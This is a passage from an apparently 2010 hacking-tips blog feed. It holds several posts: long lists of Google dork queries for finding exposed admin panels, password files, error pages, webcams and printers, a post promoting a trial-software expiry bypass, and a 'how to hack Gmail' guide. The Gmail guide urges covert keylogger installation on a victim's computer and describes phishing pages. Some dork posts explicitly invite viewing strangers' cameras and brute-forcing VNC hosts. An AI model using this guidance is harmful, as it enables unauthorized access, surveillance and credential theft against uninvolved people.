SQL”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:asp “Custom Error Message” Category Source&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:log “PHP Parse error” | “PHP Warning” | “PHP Error”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:php inurl:”logging.php” “Discuz” error&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;ht://Dig htsearch error&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;IIS 4.0 error messages&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;IIS web server error messages&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;Internal Server Error&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intext:”Error Message : Error loading required libraries.”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intext:”Warning: Failed opening” “on line” “include_path”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”Apache Tomcat” “Error Report”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”Default PLESK Page”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”Error Occurred While Processing Request” +WHERE (SELECT|INSERT) filetype:cfm&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”Error Occurred” “The error occurred in” filetype:cfm&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”Error using Hypernews” “Server Software”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”Execution of this s?ri?t not permitted”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”Under construction” “does not currently have”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:Configuration.File inurl:softcart.exe&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;MYSQL error message: supplied argument….&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;mysql error with query&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;Netscape Application Server Error page&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;ORA-00921: unexpected end of SQL command&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;ORA-00921: unexpected end of SQL command&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;ORA-00936: missing expression&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;PHP application warnings failing “include_path”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;sitebuildercontent&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;sitebuilderfiles&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;sitebuilderpictures&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;Snitz! forums db path error&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;SQL syntax error&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;Supplied argument is not a valid PostgreSQL result&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;warning “error on line” php sablotron&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;Windows 2000 web server error messages&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“ftp://” “www.eastgame.net”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“html allowed” guestbook&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;: vBulletin Version 1.1.5″&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“Select a database to view” intitle:”filemaker pro”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“set up the administrator user” inurl:pivot&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“There are no Administrators Accounts” inurl:admin.php -mysql_fetch_row&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“Welcome to Administration” “General” “Local Domains” “SMTP Authentication” inurl:admin&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“Welcome to Intranet”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“Welcome to PHP-Nuke” congratulations&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“Welcome to the Prestige Web-Based Configurator”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“YaBB SE Dev Team”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;“you can now password” | “this is a special page only seen by you. your profile visitors” inurl:imchaos&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;(“Indexed.By”|”Monitored.By”) hAcxFtpScan&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;(inurl:/shop.cgi/page=) | (inurl:/shop.pl/page=)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;allinurl:”index.php” “site=sglinks”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;allinurl:install/install.php&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;allinurl:intranet admin&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:cgi inurl:”fileman.cgi”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:cgi inurl:”Web_Store.cgi”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:php inurl:vAuthenticate&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;filetype:pl intitle:”Ultraboard Setup”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;Gallery in configuration mode&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;Hassan Consulting’s Shopping Cart Version 1.18&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intext:”Warning: * am able * write ** configuration file” “includes/configure.php” -&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”Gateway Configuration Menu”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”Horde :: My Portal” -”[Tickets”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”Mail Server CMailServer Webmail” “5.2″&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”MvBlog powered”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”Remote Desktop Web Connection”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”Samba Web Administration Tool” intext:”Help Workgroup”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”Terminal Services Web Connection”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”Uploader – Uploader v6″ -pixloads.com&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:osCommerce inurl:admin intext:”redistributable under the GNU” intext:”Online Catalog” -demo -site:oscommerce.com&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:phpMyAdmin “Welcome to phpMyAdmin ***” “running on * as root@*”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:phpMyAdmin “Welcome to phpMyAdmin ***” “running on * as root@*”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:”/NSearch/AdminServlet”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:”index.php? module=ew_filemanager”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:aol*/_do/rss_popup?blogID=&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:footer.inc.php&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:info.inc.php&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:ManyServers.htm&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:newsdesk.cgi? inurl:”t=”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:pls/admin_/gateway.htm&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:rpSys.html&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:search.php vbulletin&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:servlet/webacc&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;natterchat inurl:home.asp -site:natterchat.co.uk&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;XOOPS Custom Installation&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:htpasswd filetype:htpasswd&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:yapboz_detay.asp + View Webcam User Accessing&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;allinurl:control/multiview&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:”ViewerFrame?Mode=”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”WJ-NT104 Main Page”&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;inurl:netw_tcp.shtml&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;intitle:”supervisioncam protocol”&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6977674572159411589-2380683585231060067?l=www.pc-tricks.info' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.pc-tricks.info/feeds/2380683585231060067/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.pc-tricks.info/2010/08/google-dorks-to-find-vuln-sites.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/2380683585231060067'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/2380683585231060067'/><link rel='alternate' type='text/html' href='http://www.pc-tricks.info/2010/08/google-dorks-to-find-vuln-sites.html' title='Google dorks to find vuln. sites !'/><author><name>champ</name><uri>http://www.blogger.com/profile/00556498768219651575</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6977674572159411589.post-6070413534461439862</id><published>2010-08-16T09:26:00.000-07:00</published><updated>2010-08-16T09:30:41.463-07:00</updated><title type='text'>How to use a trial software forever legally</title><content type='html'>Now we download stuff almost daily. New products pop out so often. You can use any software forever you want. You can download trial version, right. Trial version expires after some days. You can stop that expiration. You can tell trial version of the software to not count days or do not bother about time. The software will stay and keep working like original software forever and will not expire or cease to work. You do not have to change your system clock. This little software does it all.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Time Stopper is the software which can stop the time for try out version software. When you stop the time you can use your try-out versions forever. When you stop the time of a try-out version using this Time Stopper it works via this Time Stopper. Real time and date run normally on your system. You can use any number of try-out version softwares with this software.&lt;br /&gt;&lt;br /&gt;How it Works&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;1. Open Time Stopper&lt;br /&gt;2. Browse and select .exe of required trial software&lt;br /&gt;3. Choose the new date (Any date which occurs in between your trial software time period before expiration, suggestion: set it to two days before trial software expiration date.)&lt;br /&gt;4. Choose any time&lt;br /&gt;5. Click open software on your selected date&lt;br /&gt;&lt;br /&gt;If you wish to create an icon for your modified trial software and do not want to open Time stopper every time then use last button in software to create new icon. open that trial software after that from that newly created icon always otherwise it can expire.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;This is 100% free and 100% legal!!&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.ziddu.com/download/11242135/TS2.zip.html"&gt;Download SOFTWARE HERE&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;This is only for noobs&lt;br /&gt;HOPE THIS PROVES HELPFULL TO YOU ALL&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6977674572159411589-6070413534461439862?l=www.pc-tricks.info' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.pc-tricks.info/feeds/6070413534461439862/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.pc-tricks.info/2010/08/how-to-use-trial-software-forever.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/6070413534461439862'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/6070413534461439862'/><link rel='alternate' type='text/html' href='http://www.pc-tricks.info/2010/08/how-to-use-trial-software-forever.html' title='How to use a trial software forever legally'/><author><name>champ</name><uri>http://www.blogger.com/profile/00556498768219651575</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6977674572159411589.post-819727128753514012</id><published>2010-08-14T04:41:00.000-07:00</published><updated>2010-08-14T04:42:15.613-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='GMAIL'/><title type='text'>HOW TO HACK GMAIl</title><content type='html'>Gmail is one of the most widely used email services across the globe and it’s no wonder why many people want to hack Gmail. If you are curious to know how to hack gamil then this is the post for you. Here in this post I will show you some of the real and working ways to hack Gmail and will also make you aware of the common scams and myths associated with hacking Gmail.&lt;br /&gt;&lt;br /&gt;Before I discuss how to hack Gmail I want to make my readers aware of the common scams and myths associated with hacking Gmail or any other email. So here we go&lt;br /&gt;&lt;br /&gt;1. There is no ready made software/program that will hack Gmail just with a click of a button. So never get fooled by something called Gmail hacking software. If there exists such program to hack Gmail then it’s no more than a scam.&lt;br /&gt;&lt;br /&gt;2. Most of the email hacking services on the internet claim to hack Gmail password for just a small fee. I have personally tested many of those services and found that most of them are scams.&lt;br /&gt;&lt;br /&gt;At this point you may be wondering what are the other ways to hack Gmail then. So here are the working ways to hack Gmail.&lt;br /&gt;&lt;br /&gt;With my experience in the field of hacking and security I can tell you that there are only two ways to hack Gmail account.&lt;br /&gt;&lt;br /&gt;1. Keylogging&lt;br /&gt;&lt;br /&gt;2. Phishing&lt;br /&gt;&lt;br /&gt;Any other method to hack Gmail other than these two are simply scam or dont work.&lt;br /&gt;&lt;br /&gt;Easiest Way to Hack Gmail&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;The easiest way to hack Gmail is through keylogging. It is done using a small program/software called keylogger. This keylogger when installed on any computer will capture each and every keystroke including passwords. Also it works in complete stealth mode by completely hiding itself. So installing a keylogger on the computer is the easiest way to hack Gmail. Once the victim logs into his Gmail account from this computer his Gmail username &amp; password are captured and stored instantly. The stored logs are sent to you via email. But what if you do not have physical access to the computer? Well, still you need not worry since I am going to suggest one of the best keylogger program that support installation on a local computer as well as a remote computer. The following supports remote installation as well.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;SniperSpy&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;So to hack any Gmail account all you need to do is install the keylogger on the computer from which the victim is likely to login to his Gmail account. If you do not have physical access then you need to use the remote installation feature to remotely deploy the kelogger.&lt;br /&gt;&lt;br /&gt;NOTE: For more details on keylogger read my post How to use Keyloggers&lt;br /&gt;&lt;br /&gt;Other ways to Hack Gmail&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;The other most commonly used trick to hack Gmail is using a Fake Login Page (also called as Phishing). Today, Fake login pages are the most widely used techniques to hack Gmail. A Fake Login page is a page that appears exactly as a Login page of sites like Yahoo, Gmail etc. But once we enter our password there, we end up loosing it.&lt;br /&gt;&lt;br /&gt;However creating a fake login page and taking it online to successfully hack a Gmail password is not an easy job. It demands an in depth technical knowledge of HTML and scripting languages like PHP, JSP etc. So if you are new to the concept of hacking passwords, then I recommend using the keyloggers to hack Gmail since it’s the easiest way.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6977674572159411589-819727128753514012?l=www.pc-tricks.info' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.pc-tricks.info/feeds/819727128753514012/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.pc-tricks.info/2010/08/how-to-hack-gmail.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/819727128753514012'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/819727128753514012'/><link rel='alternate' type='text/html' href='http://www.pc-tricks.info/2010/08/how-to-hack-gmail.html' title='HOW TO HACK GMAIl'/><author><name>champ</name><uri>http://www.blogger.com/profile/00556498768219651575</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6977674572159411589.post-2350224286599748259</id><published>2010-08-14T04:37:00.003-07:00</published><updated>2010-08-14T04:37:57.305-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='google'/><title type='text'>HACK GOOGLE COOL STUFFS</title><content type='html'>Wanna Hack Google To Do Cool Stuff&lt;br /&gt;&lt;br /&gt;I Am Sure That U Have Not Done Such Things Befoe !!&lt;br /&gt;&lt;br /&gt;Ok Lets Start The Hacks !!&lt;br /&gt;&gt;&gt; Note :- To Do This Kind Of Hacks U Need A Broadband Connection !!&lt;br /&gt;&gt;&gt;&lt;br /&gt;&lt;br /&gt;1st Hack :-&lt;br /&gt;Viewing Still Security Cameras Using Google :-&lt;br /&gt;&lt;br /&gt;&gt;&gt; Open Google And Type :&lt;br /&gt;&lt;br /&gt;inurl:"viewerframe?mode=motion"&lt;br /&gt;&lt;br /&gt;In The Search Bar And Search,Open Any Results Shown To See Other's Security Cameras !!&lt;br /&gt;&lt;br /&gt;2nd Hack :-&lt;br /&gt;Viewing Motion Security Video Cameras Using Google :-&lt;br /&gt;&lt;br /&gt;&gt;&gt; Open Google And Type :&lt;br /&gt;&lt;br /&gt;intitle:"Live View / - AXIS"&lt;br /&gt;&lt;br /&gt;In The Search Bar And Search,Open Any Results Shown To See Other's Online Video Cameras !!&lt;br /&gt;&lt;br /&gt;3rd Hack :-&lt;br /&gt;Unspidered Sites Using Google :-&lt;br /&gt;&lt;br /&gt;&gt;&gt; Open Google And Type:&lt;br /&gt;&lt;br /&gt;"robots.txt" "disallow:" filetype:txt&lt;br /&gt;&lt;br /&gt;In The Search Bar And Search,Open Any Results Shown To See Hidden WebPages !!&lt;br /&gt;&lt;br /&gt;4th Hack :-&lt;br /&gt;Frontpage User Info Using Google :-&lt;br /&gt;&lt;br /&gt;&gt;&gt; Open Google And Tye :&lt;br /&gt;&lt;br /&gt;inurl:_vti_pvt "service.pwd"&lt;br /&gt;&lt;br /&gt;In The Search Bar And Search,Open Any Results Shown To See Other's Frontpage User Info !!&lt;br /&gt;&lt;br /&gt;5th Hack :-&lt;br /&gt;PHP Photo Album Hack Using Google :-&lt;br /&gt;&lt;br /&gt;&gt;&gt; Open Google And Tye :&lt;br /&gt;&lt;br /&gt;inurl:"phphotoalbum/upload"&lt;br /&gt;&lt;br /&gt;In The Search Bar And Search,Open Any Results Shown To Upload/See/Download Other's Photo Album's !!&lt;br /&gt;&lt;br /&gt;6th Hack :-&lt;br /&gt;VNC User INFO Using Google :-&lt;br /&gt;&lt;br /&gt;&gt;&gt; Open Google And Tye :&lt;br /&gt;&lt;br /&gt;"vnc desktop"inurl:5800&lt;br /&gt;&lt;br /&gt;In The Search Bar And Search,Open Any Results Shown To Make Bruteforce Attack To Access Other Computers !!&lt;br /&gt;&lt;br /&gt;7th Hack :-&lt;br /&gt;Accessing Printers Using Google :-&lt;br /&gt;&lt;br /&gt;&gt;&gt; Open Google And Tye :&lt;br /&gt;&lt;br /&gt;inurl:"port_255" -htm&lt;br /&gt;&lt;br /&gt;In The Search Bar And Search,Open Any Results Shown To See/Configure Print Any Documents On Other Network Prnters !!&lt;br /&gt;&lt;br /&gt;8th Hack :-&lt;br /&gt;PHP Admin Account Hack Using Google :-&lt;br /&gt;&lt;br /&gt;&gt;&gt; Open Google And Tye :&lt;br /&gt;&lt;br /&gt;intitlehpMyAdmin "Welcome to phpMyAdmin"***" "running on * as root@*"&lt;br /&gt;&lt;br /&gt;In The Search Bar And Search,Open Any Results Shown To Go To Somebody's WebPage Admin Accounts !!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6977674572159411589-2350224286599748259?l=www.pc-tricks.info' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.pc-tricks.info/feeds/2350224286599748259/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.pc-tricks.info/2010/08/hack-google-cool-stuffs_14.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/2350224286599748259'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/2350224286599748259'/><link rel='alternate' type='text/html' href='http://www.pc-tricks.info/2010/08/hack-google-cool-stuffs_14.html' title='HACK GOOGLE COOL STUFFS'/><author><name>champ</name><uri>http://www.blogger.com/profile/00556498768219651575</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6977674572159411589.post-6515615541646095107</id><published>2010-08-14T04:37:00.001-07:00</published><updated>2010-08-14T04:37:55.694-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='g'/><title type='text'>HACK GOOGLE COOL STUFFS</title><content type='html'>Wanna Hack Google To Do Cool Stuff&lt;br /&gt;&lt;br /&gt;I Am Sure That U Have Not Done Such Things Befoe !!&lt;br /&gt;&lt;br /&gt;Ok Lets Start The Hacks !!&lt;br /&gt;&gt;&gt; Note :- To Do This Kind Of Hacks U Need A Broadband Connection !!&lt;br /&gt;&gt;&gt;&lt;br /&gt;&lt;br /&gt;1st Hack :-&lt;br /&gt;Viewing Still Security Cameras Using Google :-&lt;br /&gt;&lt;br /&gt;&gt;&gt; Open Google And Type :&lt;br /&gt;&lt;br /&gt;inurl:"viewerframe?mode=motion"&lt;br /&gt;&lt;br /&gt;In The Search Bar And Search,Open Any Results Shown To See Other's Security Cameras !!&lt;br /&gt;&lt;br /&gt;2nd Hack :-&lt;br /&gt;Viewing Motion Security Video Cameras Using Google :-&lt;br /&gt;&lt;br /&gt;&gt;&gt; Open Google And Type :&lt;br /&gt;&lt;br /&gt;intitle:"Live View / - AXIS"&lt;br /&gt;&lt;br /&gt;In The Search Bar And Search,Open Any Results Shown To See Other's Online Video Cameras !!&lt;br /&gt;&lt;br /&gt;3rd Hack :-&lt;br /&gt;Unspidered Sites Using Google :-&lt;br /&gt;&lt;br /&gt;&gt;&gt; Open Google And Type:&lt;br /&gt;&lt;br /&gt;"robots.txt" "disallow:" filetype:txt&lt;br /&gt;&lt;br /&gt;In The Search Bar And Search,Open Any Results Shown To See Hidden WebPages !!&lt;br /&gt;&lt;br /&gt;4th Hack :-&lt;br /&gt;Frontpage User Info Using Google :-&lt;br /&gt;&lt;br /&gt;&gt;&gt; Open Google And Tye :&lt;br /&gt;&lt;br /&gt;inurl:_vti_pvt "service.pwd"&lt;br /&gt;&lt;br /&gt;In The Search Bar And Search,Open Any Results Shown To See Other's Frontpage User Info !!&lt;br /&gt;&lt;br /&gt;5th Hack :-&lt;br /&gt;PHP Photo Album Hack Using Google :-&lt;br /&gt;&lt;br /&gt;&gt;&gt; Open Google And Tye :&lt;br /&gt;&lt;br /&gt;inurl:"phphotoalbum/upload"&lt;br /&gt;&lt;br /&gt;In The Search Bar And Search,Open Any Results Shown To Upload/See/Download Other's Photo Album's !!&lt;br /&gt;&lt;br /&gt;6th Hack :-&lt;br /&gt;VNC User INFO Using Google :-&lt;br /&gt;&lt;br /&gt;&gt;&gt; Open Google And Tye :&lt;br /&gt;&lt;br /&gt;"vnc desktop"inurl:5800&lt;br /&gt;&lt;br /&gt;In The Search Bar And Search,Open Any Results Shown To Make Bruteforce Attack To Access Other Computers !!&lt;br /&gt;&lt;br /&gt;7th Hack :-&lt;br /&gt;Accessing Printers Using Google :-&lt;br /&gt;&lt;br /&gt;&gt;&gt; Open Google And Tye :&lt;br /&gt;&lt;br /&gt;inurl:"port_255" -htm&lt;br /&gt;&lt;br /&gt;In The Search Bar And Search,Open Any Results Shown To See/Configure Print Any Documents On Other Network Prnters !!&lt;br /&gt;&lt;br /&gt;8th Hack :-&lt;br /&gt;PHP Admin Account Hack Using Google :-&lt;br /&gt;&lt;br /&gt;&gt;&gt; Open Google And Tye :&lt;br /&gt;&lt;br /&gt;intitlehpMyAdmin "Welcome to phpMyAdmin"***" "running on * as root@*"&lt;br /&gt;&lt;br /&gt;In The Search Bar And Search,Open Any Results Shown To Go To Somebody's WebPage Admin Accounts !!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6977674572159411589-6515615541646095107?l=www.pc-tricks.info' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.pc-tricks.info/feeds/6515615541646095107/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.pc-tricks.info/2010/08/hack-google-cool-stuffs.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/6515615541646095107'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6977674572159411589/posts/default/6515615541646095107'/><link rel='alternate' type='text/html' href='http://www.pc-tricks.info/2010/08/hack-google-cool-stuffs.html' title='HACK 